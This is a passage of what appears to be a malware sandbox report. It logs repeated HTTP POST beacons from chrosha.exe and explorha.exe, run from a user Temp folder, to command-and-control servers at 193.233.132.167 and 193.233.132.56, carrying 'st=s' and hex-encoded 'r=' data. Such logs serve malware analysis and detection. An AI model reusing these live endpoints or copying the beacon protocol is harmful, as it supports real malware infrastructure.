                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.718770981 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      529192.168.2.550374193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.970690966 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.209656000 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      530192.168.2.550375193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.082505941 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.326054096 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      531192.168.2.550376193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.461373091 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.713660955 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      532192.168.2.550377193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.574251890 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.824208021 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      533192.168.2.550378193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:26.077305079 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:26.329679966 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      534192.168.2.550379193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:26.178901911 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:26.424182892 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      535192.168.2.550380193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:26.586277008 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:26.844441891 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      536192.168.2.550381193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:26.673719883 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:26.921539068 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      537192.168.2.550382193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:27.223351955 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:27.476679087 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      538192.168.2.550383193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:27.275361061 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:27.522288084 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      539192.168.2.550384193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:27.723212004 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:27.972114086 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      540192.168.2.550385193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:27.774044991 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.020169020 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      541192.168.2.550386193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.332118988 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.576206923 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      542192.168.2.550387193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.377913952 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.624866009 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      543192.168.2.550388193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.835767031 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:29.085215092 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      544192.168.2.550389193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.871520042 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
